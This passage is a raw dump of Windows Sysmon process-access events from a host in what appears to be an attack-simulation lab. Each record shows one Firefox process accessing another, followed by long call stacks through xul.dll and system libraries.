Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.472{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.425{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.425{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.425{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.394{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.222{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.222{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.222{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.909{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.909{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.817{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.817{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.817{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.646{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.646{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.646{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.646{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.646{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla 